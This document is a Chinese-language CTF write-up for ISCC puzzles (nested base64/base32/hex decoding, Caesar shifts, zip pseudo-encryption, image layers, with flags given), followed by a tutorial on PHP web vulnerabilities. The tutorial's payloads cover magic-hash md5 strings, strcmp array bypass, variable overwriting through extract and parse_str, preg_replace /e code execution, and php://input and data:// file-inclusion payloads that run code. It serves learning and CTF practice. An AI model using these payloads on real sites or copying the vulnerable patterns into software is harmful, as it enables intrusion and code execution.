qRmFkRkpzWkU1V2JGa3dWbXhrTUdFeVJraFRiRnBYWVd4d1dGWnFUbE5YUmxsNVRWVmFiRkp0VW5wWlZWcFhZVlpLZFZGdWJGZGlXRUpJV1ZSS1QxWXhTblZWYlhoVFlYcFdWVmRYZUZOamF6RkhWMjVTYWxKWVVrOVZiVEUwVjBaYVNFNVZPVmRXYlZKS1ZWZDRhMWRzV2taWGEzaFhUVlp3V0ZwR1pFOVRSVFZZWlVkc1UyRXpRbHBXYWtvd1lURkplRmR1U2s1V1ZscHdWVzB4VTFac1duUk5WazVPVFZkU1dGZHJWbXRoYXpGeVRsVndWbFl6YUZoV2FrWmhZekpPUjJKR1pGTmxhMVYzVjJ0U1IyRXhUa2RWYmtwb1VtdEtXRmxzWkc5a2JHUllaRVprYTJKV1ducFhhMXB2Vkd4T1NHRklRbFZXTTJoTVZqQmFZVk5GTlZaa1JscFRZbFpLU0ZaSGVGWmxSbHBYVjJ0YVQxWldTbFpaYTFwM1dWWndWMXBHWkZSU2EzQXdXVEJWTVZZeVNuSlRWRUpYWWtad2NsUnJXbHBsUmxweVdrWm9hVkpzY0ZsWFYzUnJWVEZaZUZkdVVtcGxhMHB5VkZaYVMxZEdXbk5oUnpsWVVteHNNMWxyVWxkWlZscFhWbGhvVjFaRldtaFdha3BQVWxaU2MxcEhhRTVpUlc4eVZtdGFWMkV4VVhoYVJXUlVZa2Q0Y1ZWdGRIZGpSbHB4VkcwNVZsWnRVbGhXVjNSclYyeGFjMk5GYUZkaVIyaHlWbTB4UzFaV1duSlBWbkJwVW14d2IxZHNWbUZoTWs1elZtNUtWV0pHV2s5V2JHaERVMVphY1ZKdE9XcE5WbkJaVld4b2IxWXlSbk5UYldoV1lURmFhRlJVUm1GamJIQkhWR3hTVjJFelFqVldSM2hoWVRGU2RGTnJXbXBTVjFKWVZGWmFTMUpHYkhGU2JrNVlVbXR3ZVZkcldtdGhWa2w1WVVjNVYxWkZTbWhhUkVaaFZqRldjMWRzWkZoU01taFFWa1phWVdReFNuTldXR3hyVWpOU2IxVnRkSGRXYkZwMFpVaE9XbFpyY0ZsV1YzQlBWbTFXY2xkdGFGWmlXRTE0Vm0xNGExWkdXbGxqUms1U1ZURldObFZyVGxabGJFcENTbFJPUlVwVVRrVSUzRA==

base64 一直解

注意 url 编码

U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4
B5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1z
iN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc=

AES key 为空

缽娑遠呐者若奢顛悉呐集梵提梵蒙夢怯倒耶哆般究有栗

tudoucode

解密

把我复制走

有趣的 ISCC

winhex 末尾

\u0066\u006c\u0061\u0067\u007b\u0069\u0073\u0063\u0063\u0020\u0069\u0073\u0020\u0066\u0075\u006e\u007d

unicode 解码

\u0066\u006c\u0061\u0067\u007b\u0069\u0073\u0063\u0063\u0020\u0069\u0073\u0020\u0066\u0075\u006e\u007d

再解一次

flag{iscc is fun}

Where is the FLAG?

拖进 tweakpng 看到 Adobe Photoshop

打开后拼接图层

扫描即可得到 flag

凯撒十三世

ebdgc697g95w3

13 次移位

roqtp697t95j3

提交发现不对 后来想想 flag 开头应该是 flag{} 之类的

r -> f o -> l q -> a t -> g

以此类推

flag:yougotme

一只猫的心思

foremost 分离出 doc

名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通

拿之前的网址解密

523156615245644E536C564856544E565130354B553064524D6C524E546B4A56535655795645644F5530524857544A4553553943566B644A4D6C524E546C7052523155795645744F536C5248515670555330354452456456576B524854554A585231457956554E4F51305A4855544E4553303153566B64424D6C524A546B7058527A525A5245744F576C5A4854544A5554553554513063304E46524C54564A5652316B795255744F51305A4856544E5554564661566B6C464D6B5252546B70595231557A5245394E516C5A4856544A555355354B566B644E5756524E5455705752316B7A5255564F55305248566B465553564A4356306C4E4D6C524E546B4A565231557952453152556C564A56544A455555354B5530644E5756525054554A56523030795645314F516C5A4857544A4553303143566B64464D305648546B744352314A425645744F576C5A4855544A4651303543566B64564D6B524854554A555230557A52454E4F536C644855544A5554553543566B645A4D6B564A546C4E445231566152456C52576C5A4855544A5553303544516B64564D6C524C54564A55523045795245314F556C4A4856544E455355354B56556C564D6B564E546B70535230315A52457452536C564951544A555455354B565564535156524A54564A575230457956456C4E576C46485454525553303143566B6446576C564A54544A46

hex

R1VaREdNSlVHVTNVQ05KU0dRMlRNTkJVSVUyVEdOU0RHWTJESU9CVkdJMlRNTlpRR1UyVEtOSlRHQVpUS05DREdVWkRHTUJXR1EyVUNOQ0ZHUTNES01SVkdBMlRJTkpXRzRZREtOWlZHTTJUTU5TQ0c0NFRLTVJVR1kyRUtOQ0ZHVTNUTVFaVklFMkRRTkpYR1UzRE9NQlZHVTJUSU5KVkdNWVRNTUpWR1kzRUVOU0RHVkFUSVJCV0lNMlRNTkJVR1UyRE1RUlVJVTJEUU5KU0dNWVRPTUJVR00yVE1OQlZHWTJES01CVkdFM0VHTktCR1JBVEtOWlZHUTJFQ05CVkdVMkRHTUJUR0UzRENOSldHUTJUTU5CVkdZMkVJTlNDR1VaRElRWlZHUTJUS05DQkdVMlRLTVJUR0EyRE1OUlJHVTNESU5KVUlVMkVNTkpSR01ZREtRSlVIQTJUTU5KVUdSQVRJTVJWR0EyVElNWlFHTTRUS01CVkdFWlVJTTJF

base64

GUZDGMJUGU3UCNJSGQ2TMNBUIU2TGNSDGY2DIOBVGI2TMNZQGU2TKNJTGAZTKNCDGUZDGMBWGQ2UCNCFGQ3DKMRVGA2TINJWG4YDKNZVGM2TMNSCG44TKMRUGY2EKNCFGU3TMQZVIE2DQNJXGU3DOMBVGU2TINJVGMYTMMJVGY3EENSDGVATIRBWIM2TMNBUGU2DMQRUIU2DQNJSGMYTOMBUGM2TMNBVGY2DKMBVGE3EGNKBGRATKNZVGQ2ECNBVGU2DGMBTGE3DCNJWGQ2TMNBVGY2EINSCGUZDIQZVGQ2TKNCBGU2TKMRTGA2DMNRRGU3DINJUIU2EMNJRGMYDKQJUHA2TMNJUGRATIMRVGA2TIMZQGM4TKMBVGEZUIM2E

base32

5231457A5245644E536C6448525670555530354C5230645A4E4652505456705753566B7952464E4E576C5A485756705554553161566B6C5A4D6C5644546B4E485231704356456450516C5A4A57544A4554303161564564564D6B524C54554A555230466156454E4F51305A4856544A425054303950513D3D

hex

R1EzREdNSldHRVpUU05LR0dZNFRPTVpWSVkyRFNNWlZHWVpUTU1aVklZMlVDTkNHR1pCVEdPQlZJWTJET01aVEdVMkRLTUJUR0FaVENOQ0ZHVTJBPT09PQ==

base64

GQ3DGMJWGEZTSNKGGY4TOMZVIY2DSMZVGYZTMMZVIY2UCNCGGZBTGOBVIY2DOMZTGU2DKMBTGAZTCNCFGU2A====

base32

463161395F69735F493563635F5A4F6C385F4733545030314E54

hex

F1a9_is_I5cc_ZOl8_G3TP01NT

暴力XX不可取

zip 文件 猜测为伪加密

ZipCenOp.jar

解压后打开 flag.txt

vfppjrnerpbzvat

凯撒移位 每一对都试一遍

isccwearecoming

13 次移位

PHP是一门比较松散的语言，即简单方便，又容易出现一些问题。本文主要总结一些作者遇到过的一些知识点，弱类型、变量覆盖、正则表达式、以及php伪协议等。（欢迎各位小伙伴补充交流）

一 、PHP弱类型

0x01 “==”与”===”的区别

“==”在进行比较时先将字符串类型转化成相同在比较。（如果比较涉及到数字内容的字符串，则字符串会被转换成数值，并且比较按照数值大小来进行）

“===”在进行比较时先进行字符串类型判断，再比教。

“根据php手册中所讲，字符串的开头决定了它转换后的值，如果该字符串以合法的数值开始，则使用该合法数值，否则其值为0”

1 == ‘1’; //true

1 == ‘1abc’; //true

0 == ‘admin’; //true

0 === ‘admin’; //false

0e开头的字符串，在比较时被当作科学记数法。所以在hash比较时我们可以利用php弱类型，进行绕过。这里以md5为例
<?php 

if(isset($_POST['uname'])&&isset($_POST['pwd'])){

     if(md5($_POST['pwd'] == 0)){

         echo $flag; 

     } 

} 

?>

贴一些常用到的md5 ==0的字符串。
QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

s878926199a
0e545993274517709034328855841020

s1091221200a
0e940624217856561557816327384675

s1885207154a
0e509367213418206700842008763514

并且md5()无法处理数组，所以当传入两个数组时两边都会返回null

var_dump(md5($array1)==var_dump($array2)); //true
var_dump(null==null); //true

0x02  strcmp()、strcasecmp()函数

strcmp()和strcasecmp()函数用于比较两个字符串，前者区分大小写。这两个函数都无法处理数组，当传入数组时，返回null。
$flag = "*******";
if(strcmp(($_GET['user']),$flag) == 0){
echo $flag;
}

var_dump(null==0); //true 

0x03  switch()函数

如果是数字类型的case的话，switch会将参数转化为数值。

$id = "2bc";
switch($id){
case 1:
case 2:
echo $flag;}

0x04  json绕过
$message = json_decode($_POST['message']);
$key ="*********";
if ($message->key == $key) {
echo "flag";
}
else {
echo "fail";
}
}
else{
echo "~~~~";
}

输入一个json类型的字符串，json_decode会解码为一个数组。payload为 message = {“key”:0}

二、变量覆盖

0x01  $$的使用

if (!isset($_POST["flag"]) )
die($_403);
foreach ($_GET as $k => $v){
$$k = $$v;
}
foreach ($_POST as $k => $v){
$$k = $v;
}
if ( $_POST["flag"] !== $flag )
die($_403);
echo "flag: ". $flag . "\n";
die($_200);

0x02  extract()函数

该函数使用数组键名作为变量名，使用数组键值作为变量值针对数组中的每一个元素，将在当前符号表中创建对应的一个变量。
$flag = "******"
extract($_GET)
if($text == $f){
echo $flag
}

最终payload为： ?text=&f=

0x03  parse_str()函数

该函数用于把查询字符串解析到变量中，如果没有array参数，则由该函数设置的变量将覆盖已存在的同名变量。
$chabug = 'www.chabug.com';
parse_str($_SERVER['QUERY_STRING']);
echo $chabug;

payload为： ?chabug=s1ye  则页面返回 s1ye

三、正则表达式

0x01  eregi()函数
字符串对比解析，当ereg读取字符串string时,%00后面的字符串不会不会被解析。
if (ereg ("^[a-zA-Z]+$", $_GET['a']) !== FALSE) {
echo 'You password must be alphabet';

?a=abc%00123可以绕过(php 5.3x已经不再支持该用法)

0x02  preg_replace()函数
preg_replace() 的第一个参数如果存在 /e 模式修饰符，则允许代码执行。（如果没有/e修饰符可以尝试%00截断。）
preg_replace("/test/e",$_GET["chabug"],"jutst test");

payload:  ?chabug=phpinfo()

四、PHP伪协议

php伪协议(file://,php://filter,php://input,zip://,compress.bzip2://,compress.zlib://,data://)

php版本 <= 5.2可以使用%00进行截断。

file:// 在 allow_url_fopen和allow_url_include双off情况下可以正常使用，用于访问本地文件系统。

用法： file://文件绝对路径和文件名

php://  不需要开启allow_url_fopen(仅php://input,php://stdin,php://memory和php://temp需要开启allow_url_include)

php://filter 读取源码并进行base64编码输出,不然会直接当作php代码执行，就看不到源代码内容了。(在双off下可以正常使用)

php://input 可以访问请求的原始数据的只读流,将post请求中的数据作为php代码执行。

例如：

get:  /include.php?file=php://input

post: <?php phpinfo(); ?>

就会返回phpinfo信息。也可以构造语句getshell。

zip://,bzip://,zlib://协议在双off的情况下也可以正常使用。

使用方法:

zip://chabug.zip#flag.txt（zip://绝对路径#子文件名,flag.txt内容就会以php代码执行。）

compress.bzip2://chabug.bz2和compress.zlib://chabug.gz用法相同

/include.php?file=compress.bzip2://绝对路径/shell.jpg 或者 compress.bzip2://./shell.jpg

data://协议(需要满足双on条件)

/include.php?file=data://text/plain,<?php phpinfo();?>

or data://text/plain;base64,PD9waHAgcGhwaW5mbygpPw4=

or data:text/plain,<?php phpinfo();?>

or data:text/plain;base64,PD9waHAgcGhwaW5mbygpPw4=

五、PHP别名

php2,php3,php4,php5,phps,pht,phtm,phtml。

在这里把自己遇到的一些常见知识点总结并分享出来，欢迎各位小伙伴交流指点。

参考链接：

php伪协议实现命令执行的七种姿势

代码审计|变量覆盖漏洞